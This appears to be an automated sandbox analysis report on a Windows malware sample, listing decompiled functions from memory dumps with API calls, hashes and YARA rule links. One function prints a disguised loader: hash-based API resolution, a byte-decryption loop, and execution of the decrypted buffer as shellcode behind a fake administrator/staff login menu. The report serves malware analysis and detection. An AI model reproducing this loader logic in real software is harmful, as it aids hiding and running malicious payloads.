Uniqueness

Uniqueness Score: -1.00%

Function 0040ACC3, Relevance: 1.6, APIs: 1, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040ACC3(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v540;
				char _t16;
				void* _t18;
				intOrPtr _t20;
				void* _t24;
				void* _t31;
				void* _t34;
				void* _t37;
				void* _t38;

				_push(ss);
				asm("cli");
				asm("loop 0xffffffa6");
				asm("invalid");
				if(__eflags < 0) {
					L7:
					LdrLoadDll(0); // executed
					_t16 = _v12;
					goto L8;
				} else {
					_push(_t31);
					_t31 = _t34;
					_v12 =  &_v540;
					_t18 = E0041C820( &_v16, 0x104, _a4);
					_t37 = _t34 - 0x214 + 0xc;
					if(_t18 != 0) {
						_t20 = E0041CC40(__eflags, _v8);
						_t38 = _t37 + 4;
						__eflags = _t20;
						if(_t20 != 0) {
							E0041CEC0(_t24,  &_v12, 0);
							_t38 = _t38 + 8;
						}
						_t16 = E0041B070(_v8);
						_v16 = _t16;
						__eflags = _t16;
						if(_t16 == 0) {
							_push( &_v16);
							_push( &_v12);
							_push(0);
							goto L7;
						}
						L8:
						return _t16;
					} else {
						return _t18;
					}
				}
			}

0x0040acc3
0x0040acc4
0x0040acc5
0x0040acc7
0x0040acce
0x0040ad40
0x0040ad42
0x0040ad44
0x00000000
0x0040acd0
0x0040acd0
0x0040acd1
0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad36
0x0040ad3d
0x0040ad3e
0x00000000
0x0040ad3e
0x0040ad47
0x0040ad4a
0x0040acfb
0x0040acfe
0x0040acfe
0x0040acf9

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: adeb3630c6495c4263cc709c1ceb55c5c37d0ce7be4dfb3474c6913184be2a7b
Instruction ID: 27ea7b3ef879d42a5cb062a5fc941e3b38e9ee1fa683b47d6cf2297829b43502
Opcode Fuzzy Hash: adeb3630c6495c4263cc709c1ceb55c5c37d0ce7be4dfb3474c6913184be2a7b
Instruction Fuzzy Hash: 76117B3590C3455BEB20EB589885AF9BB66DF11308F0901BBEC489B383F5378928C796

Uniqueness

Uniqueness Score: -1.00%

Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 58
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E004082E8(intOrPtr __eax, void* __ecx, void* __edx, intOrPtr _a4, long _a8) {
				char _v68;
				char _v75;
				char _v76;
				void* _t16;
				int _t17;
				void* _t20;
				long _t27;
				int _t32;
				void* _t35;
				void* _t37;
				void* _t42;

				asm("invalid");
				_push(__eax);
				 *((intOrPtr*)(__ecx - 0x74aa05d1)) = __eax;
				_t35 = _t37;
				_v76 = 0;
				E0041BA30( &_v75, 0, 0x3f);
				_push(3);
				_push( &_v76);
				E0041C5D0();
				_t16 = E0040ACD0(_t20, _t42, _a4 + 0x1c,  &_v68); // executed
				_t17 = E00414E20(_a4 + 0x1c, _t16, 0, 0, 0xc4e7b6d6);
				_t32 = _t17;
				if(_t32 != 0) {
					_t27 = _a8;
					_t17 = PostThreadMessageW(_t27, 0x111, 0, 0); // executed
					if(_t17 == 0) {
						_t17 =  *_t32(_t27, 0x8003, _t35 + (E0040A460(1, 8) & 0x000000ff) - 0x40, _t17);
					}
				}
				return _t17;
			}

0x004082e8
0x004082eb
0x004082ec
0x004082f1
0x004082ff
0x00408303
0x0040830b
0x0040830d
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 39b1e4d1dd7fe2ce3fdb9b875fa3d6a6bdaa123be0e48b7cc5e474ac70d42b92
Instruction ID: 54f837af9d08cd04c63d557aac02062186b2bf4169783f61d078ce46b9af9211
Opcode Fuzzy Hash: 39b1e4d1dd7fe2ce3fdb9b875fa3d6a6bdaa123be0e48b7cc5e474ac70d42b92
Instruction Fuzzy Hash: 8601B971A803287AEB21A6659C02FFF7B2C9B81B54F04411EFF04BA1C1D6A9691546F9

Uniqueness

Uniqueness Score: -1.00%

Function 004082B4, Relevance: 1.6, APIs: 1, Instructions: 57
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E004082B4(void* __ecx, void* __eflags) {
				void* _t8;
				void* _t10;
				int _t11;
				void* _t14;
				void* _t17;
				long _t22;
				int _t27;
				void* _t31;

				asm("out dx, al");
				asm("invalid");
				asm("adc dh, [ecx+0x60a04bf0]");
				_pop(ss);
				if(__eflags > 0) {
					_push(__ecx);
					E0041C5D0();
					_t10 = E0040ACD0(_t17, __eflags,  *((intOrPtr*)(_t31 + 8)) + 0x1c, _t31 - 0x40); // executed
					_t11 = E00414E20( *((intOrPtr*)(_t31 + 8)) + 0x1c, _t10, 0, 0, 0xc4e7b6d6);
					_t27 = _t11;
					__eflags = _t27;
					if(_t27 != 0) {
						_t22 =  *(_t31 + 0xc);
						_t11 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
						__eflags = _t11;
						if(_t11 == 0) {
							_t11 =  *_t27(_t22, 0x8003, _t31 + (E0040A460(1, 8) & 0x000000ff) - 0x40, _t11);
						}
					}
					return _t11;
				} else {
					_t14 = E0041B470(_t8, __ecx, 0x11c6f95e);
					return E0041B320(__ecx) + _t14 + 0x1000;
				}
			}

0x004082b4
0x004082b5
0x004082b7
0x004082bd
0x004082be
0x0040830d
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x00408338
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372
0x004082c0
0x004082c6
0x004082dd
0x004082dd

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 30002428e36d1ab2402744aead2649eef3b558860f38a04f97227f5ac49ea7ce
Instruction ID: dfc37766f43e8edaff314dca7264f230cff1ff235eec0dfc44312909523bb24f
Opcode Fuzzy Hash: 30002428e36d1ab2402744aead2649eef3b558860f38a04f97227f5ac49ea7ce
Instruction Fuzzy Hash: 6201757194021876D62076656C03FFF371CAF80B58F09405EFE04BA1C2D6BD591543E9

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E004082F0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041BA30( &_v67, 0, 0x3f);
				_push(3);
				_push( &_v68);
				E0041C5D0();
				_t12 = E0040ACD0(__ebx, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A460(1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830b
0x0040830d
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
Instruction ID: 1050077c77294267169ebb916dfae3a1405fb9879d8789690f6f999e3cf74240
Opcode Fuzzy Hash: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
Instruction Fuzzy Hash: AD01D831A8032877E720A6959C03FFE771C6B40F54F044019FF04BA1C1E6A8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A391, Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E0041A391(void* __eax, void* __eflags, WCHAR* _a4, void* _a16) {
				struct _LUID _v3;
				short* __esi;
				struct _LUID* __ebp;
				intOrPtr* _t7;

				asm("aaa");
				asm("fnstenv [ecx+ecx*8]");
				asm("int3");
				if(__eflags < 0) {
					return  *_t7();
				} else {
					__eax =  &(__eax[0xffffffffed9df0ca]);
					__eflags = __eax;
					 *0x8b55c63e = __eax;
					__ebp = __esp;
					__eax = _a4;
					__ecx = __eax[0x50c];
					__esi =  &(__eax[0x646]);
					__eax = E0041AB30(__edi, __eax,  &(__eax[0x646]), __eax[0x50c], 0, 0x46);
					asm("adc al, 0x8b");
					__ebp =  &_v3;
					__eflags =  &_v3;
					asm("adc [ebx-0x3b7cf3b3], cl");
					asm("adc al, 0x52");
					__eax = LookupPrivilegeValueW(__ecx, __eax,  &_v3); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}

0x0041a391
0x0041a392
0x0041a395
0x0041a396
0x0041a344
0x0041a398
0x0041a398
0x0041a398
0x0041a39d
0x0041a3a1
0x0041a3a3
0x0041a3a6
0x0041a3b2
0x0041a3ba
0x0041a3c1
0x0041a3c3
0x0041a3c3
0x0041a3c4
0x0041a3ca
0x0041a3d0
0x0041a3d2
0x0041a3d3
0x0041a3d4
0x0041a3d4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 64c91604b452680cfb671d8cc0133a430cab59cbd1c40e33af26dc2857f23e5c
Instruction ID: 243e847f2458185e95899a417cb326908766502f6801cc2088df9828a0554fca
Opcode Fuzzy Hash: 64c91604b452680cfb671d8cc0133a430cab59cbd1c40e33af26dc2857f23e5c
Instruction Fuzzy Hash: C8F0E5B62002046FDB10EF99DC80FE73759EF85364F0185A9FA0C9B742D935E82687B5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A240, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A240(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AB30(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a24f
0x0041a257
0x0041a26d
0x0041a271

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 8b4701b4f03220052e2b3b5ed4c672ef58e2eb60ff823c8fb6afa074398e137c
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: DCE04FB12102046BD714DF59CC45EE777ADEF88750F014559FE0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A200, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A200(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AB30(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a217
0x0041a22d
0x0041a231

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A22D

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 4224f920e4464a65d08b1d76aaa125f94db740d8927d38e6c7d6b62f4195d12c
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 58E012B1210208ABDB14EF99CC41EA777ADAF88664F118559BA085B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3A0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041A3A0(intOrPtr _a4, void* _a16) {
				void* _v3;
				WCHAR* _t6;
				int _t7;
				WCHAR* _t8;
				void* _t11;
				struct _LUID* _t13;

				_t5 = _a4;
				_t8 =  *(_a4 + 0xa18);
				_t6 = E0041AB30(_t11, _t5, _t5 + 0xc8c, _t8, 0, 0x46);
				asm("adc al, 0x8b");
				asm("adc [ebx-0x3b7cf3b3], cl");
				asm("adc al, 0x52");
				_t7 = LookupPrivilegeValueW(_t8, _t6, _t13); // executed
				return _t7;
			}

0x0041a3a3
0x0041a3a6
0x0041a3ba
0x0041a3c1
0x0041a3c4
0x0041a3ca
0x0041a3d0
0x0041a3d4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 9e479b2eaf60326b59b5a15a73b63e8f9b290ab663b6f1255dfa49a1ae2fc0e3
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: DFE01AB12002086BDB10DF49CC85EE737ADAF88650F018155BA0857241C934F8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A23E, Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041A23E(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				asm("std");
				asm("andnps xmm1, [ebx+0x8458bec]");
				_t7 = _a4;
				_t3 = _t7 + 0xc74; // 0xc74
				E0041AB30(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a23e
0x0041a23f
0x0041a243
0x0041a24f
0x0041a257
0x0041a26d
0x0041a271

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 9c5b7bb349b325be0683450798d4c364903e8e7a3dbe56e9b98d63a2c99e4a77
Instruction ID: a0c776731b4c763e624512367b0cc1fdad14df01b6920991f96387aa884bf17e
Opcode Fuzzy Hash: 9c5b7bb349b325be0683450798d4c364903e8e7a3dbe56e9b98d63a2c99e4a77
Instruction Fuzzy Hash: 17E04FB52115046BDB14DF65CC45EA7736DEF88350F058699FE085B242C630E914CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A280, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A280(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AB30(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a283
0x0041a29a
0x0041a2a8

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A2A8

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: ec4c192c261470033b7d3fff11050ba2ce0bed15fbfecc5592b4580303735d53
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 29D017726142187BD620EB99CC85FD777ACDF487A0F0181A9BA1C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3D6, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: dba54a64cb1fa61b39a2b5cc394bc1c3ca33cfcb02b094dd61a9124cc52fd439
Instruction ID: 758f894b309da587fe690f8102b4dff29353180b267a1904e82d51553d3a1400
Opcode Fuzzy Hash: dba54a64cb1fa61b39a2b5cc394bc1c3ca33cfcb02b094dd61a9124cc52fd439
Instruction Fuzzy Hash: E0D012724055582FDB51DB649E844F6775CEB4B674328454BEC9C0E00D8824445A47E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 012B1040, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 184
libraryCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E012B1040(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed int _v5;
				intOrPtr _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				char _v1048;
				char _v7712;
				void* __ebp;
				void* _t127;
				void* _t128;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t177;

				_t177 = __fp0;
				_t170 = __esi;
				_t169 = __edi;
				_t128 = __ecx;
				E012B8770(0x1e1c);
				_v16 = GetModuleHandleW(L"Kernel32.dll");
				E012B6B80(_t128);
				_v44 = E012B6A70(_v16, 0xb616c5d9);
				_v40 = E012B6A70(_v16, 0xe0baa99);
				_v32 = E012B6A70(LoadLibraryW(L"User32.dll"), 0x23fdef72);
				_v24 = E012B6A70(LoadLibraryW(L"User32.dll"), 0x695c9378);
				_v36 = E012B6A70(_v16, 0x9347c911);
				_v28 = _v36(0, L"IEUCIZEO", 0xa);
				_v20 = _v40(0, _v28);
				E012B7AE0( &_v7712, _v20, 0x1a05);
				_t173 = _t172 + 0xc;
				_v12 = 0;
				while(_v12 < 0x1a05) {
					_v5 =  *((intOrPtr*)(_t171 + _v12 - 0x1e1c));
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x00000036;
					_v5 = (_v5 & 0x000000ff) - 1;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x0000003f;
					_v5 = (_v5 & 0x000000ff) + 0x16;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0x1f;
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 = (_v5 & 0x000000ff) - 0x81;
					_v5 = _v5 & 0x000000ff ^ 0x000000e8;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
					 *((char*)(_t171 + _v12 - 0x1e1c)) = _v5;
					_v12 = _v12 + 1;
				}
				_v44( &_v7712, 0x1a05, 0x40,  &_v48);
				_v32(_v24(0, 0,  &_v7712,  &_v1048, 0, 0, 0, 0, 0));
				E012B21E0( &_v7712, _t169, _t170, __eflags);
				while(1) {
					E012B1380(_t169, _t170, __eflags, 8, 9, 0x46, 0xd);
					E012B12B0(0xa, 0xb);
					_push("Press A to Log in as ADMINISTRATOR or S to log in as STAFF\n\n\n\t\t\t\t\t");
					E012B715C(_t127, _t169, _t170, __eflags);
					_t173 = _t173 + 4;
					__eflags = (_v5 & 0x000000ff) - 0x41;
					if((_v5 & 0x000000ff) == 0x41) {
						break;
					}
					__eflags = (_v5 & 0x000000ff) - 0x61;
					if((_v5 & 0x000000ff) != 0x61) {
						__eflags = (_v5 & 0x000000ff) - 0x53;
						if((_v5 & 0x000000ff) == 0x53) {
							L10:
							E012B3610(_t127, _t169, _t170, _t177);
						} else {
							__eflags = (_v5 & 0x000000ff) - 0x73;
							if((_v5 & 0x000000ff) != 0x73) {
								__eflags = (_v5 & 0x000000ff) - 0x1b;
								if((_v5 & 0x000000ff) == 0x1b) {
									E012B77B1(0);
								}
								__eflags = 1;
								if(1 != 0) {
									continue;
								}
							} else {
								goto L10;
							}
						}
					} else {
						break;
					}
					L14:
					__eflags = 0;
					return 0;
				}
				E012B22F0(_t169, _t170, _t177);
				goto L14;
			}

APIs

GetModuleHandleW.KERNEL32(Kernel32.dll,?,012B89A2,012B0000,00000000,00000000), ref: 012B1052

Part of subcall function 012B6B80: GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6B8C
Part of subcall function 012B6B80: HeapAlloc.KERNEL32(00000000,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6B93
Part of subcall function 012B6B80: GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6BCD
Part of subcall function 012B6B80: HeapAlloc.KERNEL32(00000000,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6BD4

LoadLibraryW.KERNEL32(User32.dll,23FDEF72,?,0E0BAA99,?,B616C5D9,?,012B89A2,012B0000,00000000,00000000), ref: 012B108C
LoadLibraryW.KERNEL32(User32.dll,695C9378,00000000,?,012B89A2,012B0000,00000000,00000000), ref: 012B10A5
_memmove.LIBCMT ref: 012B10F0
_wprintf.LIBCMT ref: 012B1249

Strings

Press A to Log in as ADMINISTRATOR or S to log in as STAFF, xrefs: 012B1244
Kernel32.dll, xrefs: 012B104D
User32.dll, xrefs: 012B1087
IEUCIZEO, xrefs: 012B10C7
User32.dll, xrefs: 012B10A0

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocLibraryLoadProcess$HandleModule_memmove_wprintf
String ID: IEUCIZEO$Kernel32.dll$Press A to Log in as ADMINISTRATOR or S to log in as STAFF$User32.dll$User32.dll
API String ID: 2215760113-1224953502
Opcode ID: 8d3ee942c3797b97ae22e11d66a1ef95d8a6754bdc2d4126ecf19215a90fc1ca
Instruction ID: 33db7170ab3bd406604840d22986ef260bcff36b0bb87cd884add83c9276a9cd
Opcode Fuzzy Hash: 8d3ee942c3797b97ae22e11d66a1ef95d8a6754bdc2d4126ecf19215a90fc1ca
Instruction Fuzzy Hash: 6871AEB4D5C2D9BADB01DBF998A07FDBFB09F16341F0480C9E691B6282C575474A8B21

Uniqueness

Uniqueness Score: -1.00%

Function 00417D89, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417D89(void* __eax, void* __ebx) {

				return __ebx;
			}

0x00417d99

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c90f7e1c8259f79bb761e6db8cdc56642b6414a283d971e825b6a17e3722bcb
Instruction ID: bc803a8824d8529347d893f65b5d6a631038668c1159a2285238f5821d0da879
Opcode Fuzzy Hash: 1c90f7e1c8259f79bb761e6db8cdc56642b6414a283d971e825b6a17e3722bcb
Instruction Fuzzy Hash: 7AB0121BF4D0140510204C4D78410B4E320D2C7137F1032B7CD0CF34004503C41601CE

Uniqueness

Uniqueness Score: -1.00%

Function 00416CBE, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416CBE(void* __eax, void* __ecx) {

				return __eax;
			}

0x00416cc9

Memory Dump Source

Source File: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc1d01aa7630ab52986fc181a10a773bab9edaf703f0e36a6921bcb8284d2d39
Instruction ID: effc195c946dc73a336b7ccad73bba469f479702d6491ef471fde352ac0536dc
Opcode Fuzzy Hash: cc1d01aa7630ab52986fc181a10a773bab9edaf703f0e36a6921bcb8284d2d39
Instruction Fuzzy Hash: FCA0022BF5E0180554285C4D7C410B4F3B8D1D713AD1033EBDD4CB35016443C42501DD

Uniqueness

Uniqueness Score: -1.00%

Function 009110D0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446

Uniqueness

Uniqueness Score: -1.00%

Function 00910060, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
